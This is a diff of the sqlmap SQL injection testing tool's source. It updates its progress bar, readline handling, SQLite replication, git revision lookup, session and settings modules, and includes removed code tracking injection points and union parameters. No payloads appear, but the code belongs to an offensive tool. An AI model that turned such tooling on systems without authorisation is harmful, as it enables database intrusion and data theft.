if eta and self.__amount < self.__max:
|
|
||||||
dataToStdout("\r%s %d/%d ETA %s" % (self.__progBar, self.__amount, self.__max, self.__convertSeconds(int(eta))))
|
|
||||||
else:
|
|
||||||
blank = " " * (80 - len("\r%s %d/%d" % (self.__progBar, self.__amount, self.__max)))
|
|
||||||
dataToStdout("\r%s %d/%d%s" % (self.__progBar, self.__amount, self.__max, blank))
|
|
||||||
|
|
||||||
|
|
||||||
def __str__(self):
|
|
||||||
"""
|
|
||||||
This method returns the progress bar string
|
|
||||||
"""
|
|
||||||
|
|
||||||
return str(self.__progBar)
|
|
||||||
@@ -1,76 +1,48 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
|
|
||||||
Based on IPython readline library (IPython/rlineimpl.py), imports and
|
|
||||||
provides the "correct" version of readline for the platform.
|
|
||||||
In addition to normal readline stuff, this module provides haveReadline
|
|
||||||
boolean and _outputfile variable used in genutils.
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
import sys
|
|
||||||
|
|
||||||
|
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
|
from lib.core.settings import PLATFORM
|
||||||
|
|
||||||
|
_readline = None
|
||||||
|
|
||||||
try:
|
try:
|
||||||
from readline import *
|
from readline import *
|
||||||
import readline as _rl
|
import readline as _readline
|
||||||
|
|
||||||
haveReadline = True
|
|
||||||
except ImportError:
|
except ImportError:
|
||||||
try:
|
try:
|
||||||
from pyreadline import *
|
from pyreadline import *
|
||||||
import pyreadline as _rl
|
import pyreadline as _readline
|
||||||
|
|
||||||
haveReadline = True
|
|
||||||
except ImportError:
|
except ImportError:
|
||||||
haveReadline = False
|
pass
|
||||||
|
|
||||||
if sys.platform == 'win32' and haveReadline:
|
if IS_WIN and _readline:
|
||||||
try:
|
try:
|
||||||
_outputfile=_rl.GetOutputFile()
|
_outputfile = _readline.GetOutputFile()
|
||||||
except AttributeError:
|
except AttributeError:
|
||||||
debugMsg = "Failed GetOutputFile when using platform's "
|
debugMsg = "Failed GetOutputFile when using platform's "
|
||||||
debugMsg += "readline library"
|
debugMsg += "readline library"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
haveReadline = False
|
_readline = None
|
||||||
|
|
||||||
# Test to see if libedit is being used instead of GNU readline.
|
# Test to see if libedit is being used instead of GNU readline.
|
||||||
# Thanks to Boyd Waters for this patch.
|
# Thanks to Boyd Waters for this patch.
|
||||||
uses_libedit = False
|
uses_libedit = False
|
||||||
|
|
||||||
if sys.platform == 'darwin' and haveReadline:
|
if PLATFORM == 'mac' and _readline:
|
||||||
import commands
|
import commands
|
||||||
|
|
||||||
(status, result) = commands.getstatusoutput( "otool -L %s | grep libedit" % _rl.__file__ )
|
(status, result) = commands.getstatusoutput("otool -L %s | grep libedit" % _readline.__file__)
|
||||||
|
|
||||||
if status == 0 and len(result) > 0:
|
if status == 0 and len(result) > 0:
|
||||||
# We are bound to libedit - new in Leopard
|
# We are bound to libedit - new in Leopard
|
||||||
_rl.parse_and_bind("bind ^I rl_complete")
|
_readline.parse_and_bind("bind ^I rl_complete")
|
||||||
|
|
||||||
debugMsg = "Leopard libedit detected when using platform's "
|
debugMsg = "Leopard libedit detected when using platform's "
|
||||||
debugMsg += "readline library"
|
debugMsg += "readline library"
|
||||||
@@ -78,17 +50,16 @@ if sys.platform == 'darwin' and haveReadline:
|
|||||||
|
|
||||||
uses_libedit = True
|
uses_libedit = True
|
||||||
|
|
||||||
|
|
||||||
# the clear_history() function was only introduced in Python 2.4 and is
|
# the clear_history() function was only introduced in Python 2.4 and is
|
||||||
# actually optional in the readline API, so we must explicitly check for its
|
# actually optional in the readline API, so we must explicitly check for its
|
||||||
# existence. Some known platforms actually don't have it. This thread:
|
# existence. Some known platforms actually don't have it. This thread:
|
||||||
# http://mail.python.org/pipermail/python-dev/2003-August/037845.html
|
# http://mail.python.org/pipermail/python-dev/2003-August/037845.html
|
||||||
# has the original discussion.
|
# has the original discussion.
|
||||||
if haveReadline:
|
if _readline:
|
||||||
try:
|
try:
|
||||||
_rl.clear_history
|
_readline.clear_history()
|
||||||
except AttributeError:
|
except AttributeError:
|
||||||
def clear_history():
|
def clear_history():
|
||||||
pass
|
pass
|
||||||
|
|
||||||
_rl.clear_history = clear_history
|
_readline.clear_history = clear_history
|
||||||
|
|||||||
119
lib/core/replication.py
Normal file
119
lib/core/replication.py
Normal file
@@ -0,0 +1,119 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import sqlite3
|
||||||
|
|
||||||
|
from extra.safe2bin.safe2bin import safechardecode
|
||||||
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.common import unsafeSQLIdentificatorNaming
|
||||||
|
from lib.core.exception import SqlmapGenericException
|
||||||
|
from lib.core.exception import SqlmapValueException
|
||||||
|
from lib.core.settings import UNICODE_ENCODING
|
||||||
|
|
||||||
|
class Replication(object):
|
||||||
|
"""
|
||||||
|
This class holds all methods/classes used for database
|
||||||
|
replication purposes.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, dbpath):
|
||||||
|
self.dbpath = dbpath
|
||||||
|
self.connection = sqlite3.connect(dbpath)
|
||||||
|
self.connection.isolation_level = None
|
||||||
|
self.cursor = self.connection.cursor()
|
||||||
|
|
||||||
|
class DataType:
|
||||||
|
"""
|
||||||
|
Using this class we define auxiliary objects
|
||||||
|
used for representing sqlite data types.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, name):
|
||||||
|
self.name = name
|
||||||
|
|
||||||
|
def __str__(self):
|
||||||
|
return self.name
|
||||||
|
|
||||||
|
def __repr__(self):
|
||||||
|
return "<DataType: %s>" % self
|
||||||
|
|
||||||
|
class Table:
|
||||||
|
"""
|
||||||
|
This class defines methods used to manipulate table objects.
|
||||||
|
"""
|
||||||
|
|
||||||
|
def __init__(self, parent, name, columns=None, create=True, typeless=False):
|
||||||
|
self.parent = parent
|
||||||
|
self.name = unsafeSQLIdentificatorNaming(name)
|
||||||
|
self.columns = columns
|
||||||
|
if create:
|
||||||
|
try:
|
||||||
|
self.execute('DROP TABLE IF EXISTS "%s"' % self.name)
|
||||||
|
if not typeless:
|
||||||
|
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s" %s' % (unsafeSQLIdentificatorNaming(colname), coltype) for colname, coltype in self.columns)))
|
||||||
|
else:
|
||||||
|
self.execute('CREATE TABLE "%s" (%s)' % (self.name, ','.join('"%s"' % unsafeSQLIdentificatorNaming(colname) for colname in self.columns)))
|
||||||
|
except Exception, ex:
|
||||||
|
errMsg = "problem occurred ('%s') while initializing the sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
|
||||||
|
errMsg += "located at '%s'" % self.parent.dbpath
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
|
def insert(self, values):
|
||||||
|
"""
|
||||||
|
This function is used for inserting row(s) into current table.
|
||||||
|
"""
|
||||||
|
|
||||||
|
if len(values) == len(self.columns):
|
||||||
|
self.execute('INSERT INTO "%s" VALUES (%s)' % (self.name, ','.join(['?'] * len(values))), safechardecode(values))
|
||||||
|
else:
|
||||||
|
errMsg = "wrong number of columns used in replicating insert"
|
||||||
|
raise SqlmapValueException(errMsg)
|
||||||
|
|
||||||
|
def execute(self, sql, parameters=[]):
|
||||||
|
try:
|
||||||
|
self.parent.cursor.execute(sql, parameters)
|
||||||
|
except sqlite3.OperationalError, ex:
|
||||||
|
errMsg = "problem occurred ('%s') while accessing sqlite database " % getSafeExString(ex, UNICODE_ENCODING)
|
||||||
|
errMsg += "located at '%s'. Please make sure that " % self.parent.dbpath
|
||||||
|
errMsg += "it's not used by some other program"
|
||||||
|
raise SqlmapGenericException(errMsg)
|
||||||
|
|
||||||
|
def beginTransaction(self):
|
||||||
|
"""
|
||||||
|
Great speed improvement can be gained by using explicit transactions around multiple inserts.
|
||||||
|
Reference: http://stackoverflow.com/questions/4719836/python-and-sqlite3-adding-thousands-of-rows
|
||||||
|
"""
|
||||||
|
self.execute('BEGIN TRANSACTION')
|
||||||
|
|
||||||
|
def endTransaction(self):
|
||||||
|
self.execute('END TRANSACTION')
|
||||||
|
|
||||||
|
def select(self, condition=None):
|
||||||
|
"""
|
||||||
|
This function is used for selecting row(s) from current table.
|
||||||
|
"""
|
||||||
|
_ = 'SELECT * FROM %s' % self.name
|
||||||
|
if condition:
|
||||||
|
_ += 'WHERE %s' % condition
|
||||||
|
return self.execute(_)
|
||||||
|
|
||||||
|
def createTable(self, tblname, columns=None, typeless=False):
|
||||||
|
"""
|
||||||
|
This function creates Table instance with current connection settings.
|
||||||
|
"""
|
||||||
|
return Replication.Table(parent=self, name=tblname, columns=columns, typeless=typeless)
|
||||||
|
|
||||||
|
def __del__(self):
|
||||||
|
self.cursor.close()
|
||||||
|
self.connection.close()
|
||||||
|
|
||||||
|
# sqlite data types
|
||||||
|
NULL = DataType('NULL')
|
||||||
|
INTEGER = DataType('INTEGER')
|
||||||
|
REAL = DataType('REAL')
|
||||||
|
TEXT = DataType('TEXT')
|
||||||
|
BLOB = DataType('BLOB')
|
||||||
54
lib/core/revision.py
Normal file
54
lib/core/revision.py
Normal file
@@ -0,0 +1,54 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import os
|
||||||
|
import re
|
||||||
|
|
||||||
|
from subprocess import PIPE
|
||||||
|
from subprocess import Popen as execute
|
||||||
|
|
||||||
|
def getRevisionNumber():
|
||||||
|
"""
|
||||||
|
Returns abbreviated commit hash number as retrieved with "git rev-parse --short HEAD"
|
||||||
|
"""
|
||||||
|
|
||||||
|
retVal = None
|
||||||
|
filePath = None
|
||||||
|
_ = os.path.dirname(__file__)
|
||||||
|
|
||||||
|
while True:
|
||||||
|
filePath = os.path.join(_, ".git", "HEAD")
|
||||||
|
if os.path.exists(filePath):
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
filePath = None
|
||||||
|
if _ == os.path.dirname(_):
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
_ = os.path.dirname(_)
|
||||||
|
|
||||||
|
while True:
|
||||||
|
if filePath and os.path.isfile(filePath):
|
||||||
|
with open(filePath, "r") as f:
|
||||||
|
content = f.read()
|
||||||
|
filePath = None
|
||||||
|
if content.startswith("ref: "):
|
||||||
|
filePath = os.path.join(_, ".git", content.replace("ref: ", "")).strip()
|
||||||
|
else:
|
||||||
|
match = re.match(r"(?i)[0-9a-f]{32}", content)
|
||||||
|
retVal = match.group(0) if match else None
|
||||||
|
break
|
||||||
|
else:
|
||||||
|
break
|
||||||
|
|
||||||
|
if not retVal:
|
||||||
|
process = execute("git rev-parse --verify HEAD", shell=True, stdout=PIPE, stderr=PIPE)
|
||||||
|
stdout, _ = process.communicate()
|
||||||
|
match = re.search(r"(?i)[0-9a-f]{32}", stdout or "")
|
||||||
|
retVal = match.group(0) if match else None
|
||||||
|
|
||||||
|
return retVal[:7] if retVal else None
|
||||||
@@ -1,108 +1,21 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
|
||||||
from lib.core.common import dataToSessionFile
|
from lib.core.common import aliasToDbmsEnum
|
||||||
from lib.core.common import readInput
|
from lib.core.common import Backend
|
||||||
from lib.core.data import conf
|
from lib.core.common import Format
|
||||||
|
from lib.core.common import hashDBWrite
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.settings import MSSQL_ALIASES
|
from lib.core.enums import HASHDB_KEYS
|
||||||
from lib.core.settings import MYSQL_ALIASES
|
from lib.core.enums import OS
|
||||||
|
from lib.core.settings import SUPPORTED_DBMS
|
||||||
def setString():
|
|
||||||
"""
|
|
||||||
Save string to match in session file.
|
|
||||||
"""
|
|
||||||
|
|
||||||
condition = (
|
|
||||||
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
|
|
||||||
not kb.resumedQueries[conf.url].has_key("String") )
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
|
||||||
dataToSessionFile("[%s][None][None][String][%s]\n" % (conf.url, conf.string))
|
|
||||||
|
|
||||||
|
|
||||||
def setRegexp():
|
|
||||||
"""
|
|
||||||
Save regular expression to match in session file.
|
|
||||||
"""
|
|
||||||
|
|
||||||
condition = (
|
|
||||||
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
|
|
||||||
not kb.resumedQueries[conf.url].has_key("Regular expression") )
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
|
||||||
dataToSessionFile("[%s][None][None][Regular expression][%s]\n" % (conf.url, conf.regexp))
|
|
||||||
|
|
||||||
|
|
||||||
def setInjection():
|
|
||||||
"""
|
|
||||||
Save information retrieved about injection place and parameter in the
|
|
||||||
session file.
|
|
||||||
"""
|
|
||||||
|
|
||||||
if kb.injPlace == "User-Agent":
|
|
||||||
kb.injParameter = conf.agent
|
|
||||||
|
|
||||||
condition = (
|
|
||||||
kb.injPlace and kb.injParameter and ( not kb.resumedQueries
|
|
||||||
or ( kb.resumedQueries.has_key(conf.url) and
|
|
||||||
( not kb.resumedQueries[conf.url].has_key("Injection point")
|
|
||||||
or not kb.resumedQueries[conf.url].has_key("Injection parameter")
|
|
||||||
or not kb.resumedQueries[conf.url].has_key("Injection type")
|
|
||||||
) ) )
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection point][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injPlace))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection parameter][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injParameter))
|
|
||||||
dataToSessionFile("[%s][%s][%s][Injection type][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], kb.injType))
|
|
||||||
|
|
||||||
|
|
||||||
def setParenthesis(parenthesisCount):
|
|
||||||
"""
|
|
||||||
@param parenthesisCount: number of parenthesis to be set into the
|
|
||||||
knowledge base as fingerprint.
|
|
||||||
@type parenthesisCount: C{int}
|
|
||||||
"""
|
|
||||||
|
|
||||||
condition = (
|
|
||||||
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
|
|
||||||
not kb.resumedQueries[conf.url].has_key("Parenthesis") )
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
|
||||||
dataToSessionFile("[%s][%s][%s][Parenthesis][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], parenthesisCount))
|
|
||||||
|
|
||||||
kb.parenthesis = parenthesisCount
|
|
||||||
|
|
||||||
|
|
||||||
def setDbms(dbms):
|
def setDbms(dbms):
|
||||||
"""
|
"""
|
||||||
@@ -111,203 +24,57 @@ def setDbms(dbms):
|
|||||||
@type dbms: C{str}
|
@type dbms: C{str}
|
||||||
"""
|
"""
|
||||||
|
|
||||||
condition = (
|
hashDBWrite(HASHDB_KEYS.DBMS, dbms)
|
||||||
not kb.resumedQueries
|
|
||||||
or ( kb.resumedQueries.has_key(conf.url) and
|
|
||||||
not kb.resumedQueries[conf.url].has_key("DBMS") )
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
_ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
|
||||||
dataToSessionFile("[%s][%s][%s][DBMS][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], dbms))
|
_ = re.search(r"\A%s( |\Z)" % _, dbms, re.I)
|
||||||
|
|
||||||
firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
|
if _:
|
||||||
"|".join([alias for alias in MYSQL_ALIASES]))
|
dbms = _.group(1)
|
||||||
dbmsRegExp = re.search("^%s" % firstRegExp, dbms, re.I)
|
|
||||||
|
|
||||||
if dbmsRegExp:
|
Backend.setDbms(dbms)
|
||||||
dbms = dbmsRegExp.group(1)
|
if kb.resolutionDbms:
|
||||||
|
hashDBWrite(HASHDB_KEYS.DBMS, kb.resolutionDbms)
|
||||||
|
|
||||||
kb.dbms = dbms
|
logger.info("the back-end DBMS is %s" % Backend.getDbms())
|
||||||
|
|
||||||
|
def setOs():
|
||||||
def setUnion(comment=None, count=None, position=None):
|
|
||||||
"""
|
"""
|
||||||
@param comment: union comment to save in session file
|
Example of kb.bannerFp dictionary:
|
||||||
@type comment: C{str}
|
|
||||||
|
|
||||||
@param count: union count to save in session file
|
{
|
||||||
@type count: C{str}
|
'sp': set(['Service Pack 4']),
|
||||||
|
'dbmsVersion': '8.00.194',
|
||||||
@param position: union position to save in session file
|
'dbmsServicePack': '0',
|
||||||
@type position: C{str}
|
'distrib': set(['2000']),
|
||||||
|
'dbmsRelease': '2000',
|
||||||
|
'type': set(['Windows'])
|
||||||
|
}
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if comment and count:
|
infoMsg = ""
|
||||||
condition = (
|
|
||||||
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
|
|
||||||
( not kb.resumedQueries[conf.url].has_key("Union comment")
|
|
||||||
or not kb.resumedQueries[conf.url].has_key("Union count")
|
|
||||||
) )
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
if not kb.bannerFp:
|
||||||
dataToSessionFile("[%s][%s][%s][Union comment][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], comment))
|
return
|
||||||
dataToSessionFile("[%s][%s][%s][Union count][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], count))
|
|
||||||
|
|
||||||
kb.unionComment = comment
|
if "type" in kb.bannerFp:
|
||||||
kb.unionCount = count
|
Backend.setOs(Format.humanize(kb.bannerFp["type"]))
|
||||||
|
infoMsg = "the back-end DBMS operating system is %s" % Backend.getOs()
|
||||||
|
|
||||||
elif position:
|
if "distrib" in kb.bannerFp:
|
||||||
condition = (
|
kb.osVersion = Format.humanize(kb.bannerFp["distrib"])
|
||||||
not kb.resumedQueries or ( kb.resumedQueries.has_key(conf.url) and
|
infoMsg += " %s" % kb.osVersion
|
||||||
( not kb.resumedQueries[conf.url].has_key("Union position")
|
|
||||||
) )
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
if "sp" in kb.bannerFp:
|
||||||
dataToSessionFile("[%s][%s][%s][Union position][%s]\n" % (conf.url, kb.injPlace, conf.parameters[kb.injPlace], position))
|
kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", ""))
|
||||||
|
|
||||||
kb.unionPosition = position
|
elif "sp" not in kb.bannerFp and Backend.isOs(OS.WINDOWS):
|
||||||
|
kb.osSP = 0
|
||||||
|
|
||||||
|
if Backend.getOs() and kb.osVersion and kb.osSP:
|
||||||
|
infoMsg += " Service Pack %d" % kb.osSP
|
||||||
|
|
||||||
def resumeConfKb(expression, url, value):
|
if infoMsg:
|
||||||
if expression == "String" and url == conf.url:
|
logger.info(infoMsg)
|
||||||
string = value[:-1]
|
|
||||||
|
|
||||||
logMsg = "resuming string match '%s' from session file" % string
|
hashDBWrite(HASHDB_KEYS.OS, Backend.getOs())
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
if string and ( not conf.string or string != conf.string ):
|
|
||||||
if not conf.string:
|
|
||||||
message = "you did not provide any string to match. "
|
|
||||||
else:
|
|
||||||
message = "The string you provided does not match "
|
|
||||||
message += "the resumed string. "
|
|
||||||
|
|
||||||
message += "Do you want to use the resumed string "
|
|
||||||
message += "to be matched in page when the query "
|
|
||||||
message += "is valid? [Y/n] "
|
|
||||||
test = readInput(message, default="Y")
|
|
||||||
|
|
||||||
if not test or test[0] in ("y", "Y"):
|
|
||||||
conf.string = string
|
|
||||||
|
|
||||||
elif expression == "Regular expression" and url == conf.url:
|
|
||||||
regexp = value[:-1]
|
|
||||||
|
|
||||||
logMsg = "resuming regular expression match '%s' from session file" % regexp
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
if regexp and ( not conf.regexp or regexp != conf.regexp ):
|
|
||||||
if not conf.regexp:
|
|
||||||
message = "you did not provide any regular expression "
|
|
||||||
message += "to match. "
|
|
||||||
else:
|
|
||||||
message = "The regular expression you provided does not "
|
|
||||||
message += "match the resumed regular expression. "
|
|
||||||
|
|
||||||
message += "Do you want to use the resumed regular expression "
|
|
||||||
message += "to be matched in page when the query "
|
|
||||||
message += "is valid? [Y/n] "
|
|
||||||
test = readInput(message, default="Y")
|
|
||||||
|
|
||||||
if not test or test[0] in ("y", "Y"):
|
|
||||||
conf.regexp = regexp
|
|
||||||
|
|
||||||
elif expression == "Injection point" and url == conf.url:
|
|
||||||
injPlace = value[:-1]
|
|
||||||
|
|
||||||
logMsg = "resuming injection point '%s' from session file" % injPlace
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
if not conf.paramDict.has_key(injPlace):
|
|
||||||
warnMsg = "none of the parameters you provided "
|
|
||||||
warnMsg += "matches the resumable injection point. "
|
|
||||||
warnMsg += "sqlmap is going to reidentify the "
|
|
||||||
warnMsg += "injectable point"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
else:
|
|
||||||
kb.injPlace = injPlace
|
|
||||||
|
|
||||||
elif expression == "Injection parameter" and url == conf.url:
|
|
||||||
injParameter = value[:-1]
|
|
||||||
|
|
||||||
logMsg = "resuming injection parameter '%s' from session file" % injParameter
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
condition = (
|
|
||||||
not conf.paramDict.has_key(kb.injPlace) or
|
|
||||||
not conf.paramDict[kb.injPlace].has_key(injParameter)
|
|
||||||
)
|
|
||||||
|
|
||||||
if condition:
|
|
||||||
warnMsg = "none of the parameters you provided "
|
|
||||||
warnMsg += "matches the resumable injection parameter. "
|
|
||||||
warnMsg += "sqlmap is going to reidentify the "
|
|
||||||
warnMsg += "injectable point"
|
|
||||||
logger.warn(warnMsg)
|
|
||||||
else:
|
|
||||||
kb.injParameter = injParameter
|
|
||||||
|
|
||||||
elif expression == "Injection type" and url == conf.url:
|
|
||||||
kb.injType = value[:-1]
|
|
||||||
|
|
||||||
logMsg = "resuming injection type '%s' from session file" % kb.injType
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Parenthesis" and url == conf.url:
|
|
||||||
kb.parenthesis = int(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming %d number of " % kb.parenthesis
|
|
||||||
logMsg += "parenthesis from session file"
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "DBMS" and url == conf.url:
|
|
||||||
dbms = value[:-1]
|
|
||||||
|
|
||||||
logMsg = "resuming back-end DBMS '%s' " % dbms
|
|
||||||
logMsg += "from session file"
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
dbms = dbms.lower()
|
|
||||||
firstRegExp = "(%s|%s)" % ("|".join([alias for alias in MSSQL_ALIASES]),
|
|
||||||
"|".join([alias for alias in MYSQL_ALIASES]))
|
|
||||||
dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, dbms)
|
|
||||||
|
|
||||||
if dbmsRegExp:
|
|
||||||
dbms = dbmsRegExp.group(1)
|
|
||||||
kb.dbmsVersion = [dbmsRegExp.group(2)]
|
|
||||||
|
|
||||||
if conf.dbms and conf.dbms.lower() != dbms:
|
|
||||||
message = "you provided '%s' as back-end DBMS, " % conf.dbms
|
|
||||||
message += "but from a past scan information on the target URL "
|
|
||||||
message += "sqlmap assumes the back-end DBMS is %s. " % dbms
|
|
||||||
message += "Do you really want to force the back-end "
|
|
||||||
message += "DBMS value? [y/N] "
|
|
||||||
test = readInput(message, default="N")
|
|
||||||
|
|
||||||
if not test or test[0] in ("n", "N"):
|
|
||||||
conf.dbms = dbms
|
|
||||||
else:
|
|
||||||
conf.dbms = dbms
|
|
||||||
|
|
||||||
elif expression == "Union comment" and url == conf.url:
|
|
||||||
kb.unionComment = value[:-1]
|
|
||||||
|
|
||||||
logMsg = "resuming union comment "
|
|
||||||
logMsg += "'%s' from session file" % kb.unionComment
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Union count" and url == conf.url:
|
|
||||||
kb.unionCount = int(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming union count "
|
|
||||||
logMsg += "%s from session file" % kb.unionCount
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|
||||||
elif expression == "Union position" and url == conf.url:
|
|
||||||
kb.unionPosition = int(value[:-1])
|
|
||||||
|
|
||||||
logMsg = "resuming union position "
|
|
||||||
logMsg += "%s from session file" % kb.unionPosition
|
|
||||||
logger.info(logMsg)
|
|
||||||
|
|||||||
@@ -1,70 +1,727 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
$Id$
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
|
||||||
|
|
||||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
|
||||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
|
||||||
|
|
||||||
sqlmap is free software; you can redistribute it and/or modify it under
|
|
||||||
the terms of the GNU General Public License as published by the Free
|
|
||||||
Software Foundation version 2 of the License.
|
|
||||||
|
|
||||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
|
||||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
|
||||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
|
||||||
details.
|
|
||||||
|
|
||||||
You should have received a copy of the GNU General Public License along
|
|
||||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
|
||||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
|
||||||
"""
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import os
|
import os
|
||||||
|
import re
|
||||||
|
import subprocess
|
||||||
|
import string
|
||||||
import sys
|
import sys
|
||||||
|
import types
|
||||||
|
|
||||||
|
from lib.core.datatype import AttribDict
|
||||||
|
from lib.core.enums import DBMS
|
||||||
|
from lib.core.enums import DBMS_DIRECTORY_NAME
|
||||||
|
from lib.core.enums import OS
|
||||||
|
from lib.core.revision import getRevisionNumber
|
||||||
|
|
||||||
# sqlmap version and site
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "0.6.3"
|
VERSION = "1.0.6.0"
|
||||||
VERSION_STRING = "sqlmap/%s" % VERSION
|
REVISION = getRevisionNumber()
|
||||||
SITE = "http://sqlmap.sourceforge.net"
|
STABLE = VERSION.count('.') <= 2
|
||||||
|
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
|
